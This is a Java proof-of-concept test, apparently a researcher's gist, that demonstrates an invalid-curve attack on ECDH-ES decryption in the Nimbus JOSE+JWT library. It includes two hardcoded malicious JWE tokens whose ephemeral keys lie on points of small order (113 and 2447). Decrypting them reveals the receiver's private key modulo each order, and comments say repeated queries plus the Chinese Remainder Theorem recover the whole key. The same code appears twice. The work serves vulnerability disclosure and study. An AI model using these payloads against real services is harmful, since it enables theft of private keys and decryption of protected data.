asanso/nimbusds.java

## nimbusds.java
    private static ECKey generateECJWK(final ECKey.Curve curve)
            throws Exception {

        final ECParameterSpec ecParameterSpec = curve.toECParameterSpec();

        KeyPairGenerator generator = KeyPairGenerator.getInstance("EC");
        generator.initialize(ecParameterSpec);
        KeyPair keyPair = generator.generateKeyPair();

        final ECPrivateKey privateKey = (ECPrivateKey) keyPair.getPrivate();

        ECPrivateKey pk = new ECPrivateKey() {

            BigInteger bi = new BigInteger(
                    "38124166010662753100689735609285807169841714722622367731519061366402702420444");

            @Override
            public ECParameterSpec getParams() {
                return ecParameterSpec;
            }

            @Override
            public String getFormat() {
                return privateKey.getFormat();
            }

            @Override
            public byte[] getEncoded() {
                return bi.toByteArray();
            }

            @Override
            public String getAlgorithm() {
                return privateKey.getAlgorithm();
            }

            @Override
            public BigInteger getS() {
                return bi;
            }
        };

        return new ECKey.Builder(curve, (ECPublicKey) keyPair.getPublic())
                .privateKey(pk).build();
    }

    public void testCycle_ECDH_ES_Curve_P256() throws Exception {

        ECKey ecJWK = generateECJWK(ECKey.Curve.P_256);

        BigInteger privateReceiverKEy = ecJWK.toECPrivateKey().getS();

        JWEHeader header = new JWEHeader.Builder(JWEAlgorithm.ECDH_ES,
                EncryptionMethod.A128GCM)
                        .agreementPartyUInfo(Base64URL.encode("Alice"))
                        .agreementPartyVInfo(Base64URL.encode("Bob")).build();

        // ========================= attacking point #1 with order 113
        // ======================
        BigInteger attackerOrderGroup1 = new BigInteger("113");
        BigInteger receiverPrivateKeyModAttackerOrderGroup1 = privateReceiverKEy
                .mod(attackerOrderGroup1);

        System.out.println("The receiver private key is equal to "
                + receiverPrivateKeyModAttackerOrderGroup1 + " mod "
                + attackerOrderGroup1);

        // The malicious JWE contains a public key with order 113
        String maliciousJWE1 = "eyJhbGciOiJFQ0RILUVTK0ExMjhLVyIsImVuYyI6IkExMjhDQkMtSFMyNTYiLCJlcGsiOnsia3R5IjoiRUMiLCJ4IjoiZ1RsaTY1ZVRRN3otQmgxNDdmZjhLM203azJVaURpRzJMcFlrV0FhRkpDYyIsInkiOiJjTEFuakthNGJ6akQ3REpWUHdhOUVQclJ6TUc3ck9OZ3NpVUQta2YzMEZzIiwiY3J2IjoiUC0yNTYifX0.qGAdxtEnrV_3zbIxU2ZKrMWcejNltjA_dtefBFnRh9A2z9cNIqYRWg.pEA5kX304PMCOmFSKX_cEg.a9fwUrx2JXi1OnWEMOmZhXd94-bEGCH9xxRwqcGuG2AMo-AwHoljdsH5C_kcTqlXS5p51OB1tvgQcMwB5rpTxg.72CHiYFecyDvuUa43KKT6w";
        JWEObject jweObject1 = JWEObject.parse(maliciousJWE1);

        ECDHDecrypter decrypter = new ECDHDecrypter(ecJWK.toECPrivateKey());
        decrypter.getJCAContext().setContentEncryptionProvider(
                BouncyCastleProviderSingleton.getInstance());
        jweObject1.decrypt(decrypter);
        // this proof that receiverPrivateKey is equals 26 % 113
        assertEquals("Gambling is illegal at Bushwood sir, and I never slice.",
                jweObject1.getPayload().toString());

        // ========================= attacking point #2 with order 2447
        // ======================
        BigInteger attackerOrderGroup2 = new BigInteger("2447");
        BigInteger receiverPrivateKeyModAttackerOrderGroup2 = privateReceiverKEy
                .mod(attackerOrderGroup2);

        System.out.println("The receiver private key is equal to "
                + receiverPrivateKeyModAttackerOrderGroup2 + " mod "
                + attackerOrderGroup2);

        // The malicious JWE contains a public key with order 2447
        String maliciousJWE2 = "eyJhbGciOiJFQ0RILUVTK0ExMjhLVyIsImVuYyI6IkExMjhDQkMtSFMyNTYiLCJlcGsiOnsia3R5IjoiRUMiLCJ4IjoiWE9YR1E5XzZRQ3ZCZzN1OHZDSS1VZEJ2SUNBRWNOTkJyZnFkN3RHN29RNCIsInkiOiJoUW9XTm90bk56S2x3aUNuZUprTElxRG5UTnc3SXNkQkM1M1ZVcVZqVkpjIiwiY3J2IjoiUC0yNTYifX0.UGb3hX3ePAvtFB9TCdWsNkFTv9QWxSr3MpYNiSBdW630uRXRBT3sxw.6VpU84oMob16DxOR98YTRw.y1UslvtkoWdl9HpugfP0rSAkTw1xhm_LbK1iRXzGdpYqNwIG5VU33UBpKAtKFBoA1Kk_sYtfnHYAvn-aes4FTg.UZPN8h7FcvA5MIOq-Pkj8A";

        JWEObject jweObject2 = JWEObject.parse(maliciousJWE2);
        decrypter.getJCAContext().setContentEncryptionProvider(
                BouncyCastleProviderSingleton.getInstance());
        jweObject2.decrypt(decrypter);
        // this proof that receiverPrivateKey is equals 2446 % 2447
        assertEquals("Gambling is illegal at Bushwood sir, and I never slice.",
                jweObject2.getPayload().toString());

        // THIS CAN BE DOIN MANY TIME
        // ....
        // AND THAN CHINESE REMAINDER THEOREM FTW
    }
	private static ECKey generateECJWK(final ECKey.Curve curve)
	throws Exception {

	final ECParameterSpec ecParameterSpec = curve.toECParameterSpec();

	KeyPairGenerator generator = KeyPairGenerator.getInstance("EC");
	generator.initialize(ecParameterSpec);
	KeyPair keyPair = generator.generateKeyPair();

	final ECPrivateKey privateKey = (ECPrivateKey) keyPair.getPrivate();

	ECPrivateKey pk = new ECPrivateKey() {

	BigInteger bi = new BigInteger(
	"38124166010662753100689735609285807169841714722622367731519061366402702420444");

	@Override
	public ECParameterSpec getParams() {
	return ecParameterSpec;
	}

	@Override
	public String getFormat() {
	return privateKey.getFormat();
	}

	@Override
	public byte[] getEncoded() {
	return bi.toByteArray();
	}

	@Override
	public String getAlgorithm() {
	return privateKey.getAlgorithm();
	}

	@Override
	public BigInteger getS() {
	return bi;
	}
	};

	return new ECKey.Builder(curve, (ECPublicKey) keyPair.getPublic())
	.privateKey(pk).build();
	}

	public void testCycle_ECDH_ES_Curve_P256() throws Exception {

	ECKey ecJWK = generateECJWK(ECKey.Curve.P_256);

	BigInteger privateReceiverKEy = ecJWK.toECPrivateKey().getS();

	JWEHeader header = new JWEHeader.Builder(JWEAlgorithm.ECDH_ES,
	EncryptionMethod.A128GCM)
	.agreementPartyUInfo(Base64URL.encode("Alice"))
	.agreementPartyVInfo(Base64URL.encode("Bob")).build();

	// ========================= attacking point #1 with order 113
	// ======================
	BigInteger attackerOrderGroup1 = new BigInteger("113");
	BigInteger receiverPrivateKeyModAttackerOrderGroup1 = privateReceiverKEy
	.mod(attackerOrderGroup1);

	System.out.println("The receiver private key is equal to "
	+ receiverPrivateKeyModAttackerOrderGroup1 + " mod "
	+ attackerOrderGroup1);

	// The malicious JWE contains a public key with order 113
	String maliciousJWE1 = "eyJhbGciOiJFQ0RILUVTK0ExMjhLVyIsImVuYyI6IkExMjhDQkMtSFMyNTYiLCJlcGsiOnsia3R5IjoiRUMiLCJ4IjoiZ1RsaTY1ZVRRN3otQmgxNDdmZjhLM203azJVaURpRzJMcFlrV0FhRkpDYyIsInkiOiJjTEFuakthNGJ6akQ3REpWUHdhOUVQclJ6TUc3ck9OZ3NpVUQta2YzMEZzIiwiY3J2IjoiUC0yNTYifX0.qGAdxtEnrV_3zbIxU2ZKrMWcejNltjA_dtefBFnRh9A2z9cNIqYRWg.pEA5kX304PMCOmFSKX_cEg.a9fwUrx2JXi1OnWEMOmZhXd94-bEGCH9xxRwqcGuG2AMo-AwHoljdsH5C_kcTqlXS5p51OB1tvgQcMwB5rpTxg.72CHiYFecyDvuUa43KKT6w";
	JWEObject jweObject1 = JWEObject.parse(maliciousJWE1);

	ECDHDecrypter decrypter = new ECDHDecrypter(ecJWK.toECPrivateKey());
	decrypter.getJCAContext().setContentEncryptionProvider(
	BouncyCastleProviderSingleton.getInstance());
	jweObject1.decrypt(decrypter);
	// this proof that receiverPrivateKey is equals 26 % 113
	assertEquals("Gambling is illegal at Bushwood sir, and I never slice.",
	jweObject1.getPayload().toString());

	// ========================= attacking point #2 with order 2447
	// ======================
	BigInteger attackerOrderGroup2 = new BigInteger("2447");
	BigInteger receiverPrivateKeyModAttackerOrderGroup2 = privateReceiverKEy
	.mod(attackerOrderGroup2);

	System.out.println("The receiver private key is equal to "
	+ receiverPrivateKeyModAttackerOrderGroup2 + " mod "
	+ attackerOrderGroup2);

	// The malicious JWE contains a public key with order 2447
	String maliciousJWE2 = "eyJhbGciOiJFQ0RILUVTK0ExMjhLVyIsImVuYyI6IkExMjhDQkMtSFMyNTYiLCJlcGsiOnsia3R5IjoiRUMiLCJ4IjoiWE9YR1E5XzZRQ3ZCZzN1OHZDSS1VZEJ2SUNBRWNOTkJyZnFkN3RHN29RNCIsInkiOiJoUW9XTm90bk56S2x3aUNuZUprTElxRG5UTnc3SXNkQkM1M1ZVcVZqVkpjIiwiY3J2IjoiUC0yNTYifX0.UGb3hX3ePAvtFB9TCdWsNkFTv9QWxSr3MpYNiSBdW630uRXRBT3sxw.6VpU84oMob16DxOR98YTRw.y1UslvtkoWdl9HpugfP0rSAkTw1xhm_LbK1iRXzGdpYqNwIG5VU33UBpKAtKFBoA1Kk_sYtfnHYAvn-aes4FTg.UZPN8h7FcvA5MIOq-Pkj8A";

	JWEObject jweObject2 = JWEObject.parse(maliciousJWE2);
	decrypter.getJCAContext().setContentEncryptionProvider(
	BouncyCastleProviderSingleton.getInstance());
	jweObject2.decrypt(decrypter);
	// this proof that receiverPrivateKey is equals 2446 % 2447
	assertEquals("Gambling is illegal at Bushwood sir, and I never slice.",
	jweObject2.getPayload().toString());

	// THIS CAN BE DOIN MANY TIME
	// ....
	// AND THAN CHINESE REMAINDER THEOREM FTW
	}